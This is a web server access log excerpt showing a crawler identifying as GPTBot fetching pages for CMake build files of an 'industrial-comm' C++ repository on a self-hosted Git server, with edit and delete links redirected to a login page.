AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:41:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11518] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:41:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:41:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13386] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10501] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10136] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11535] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 9906] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10475] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11366] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 1049] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 9907] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13403] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:41:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 14168] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16286] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11375] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:41:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:41:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:41:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:41:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:41:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:19:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11549] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 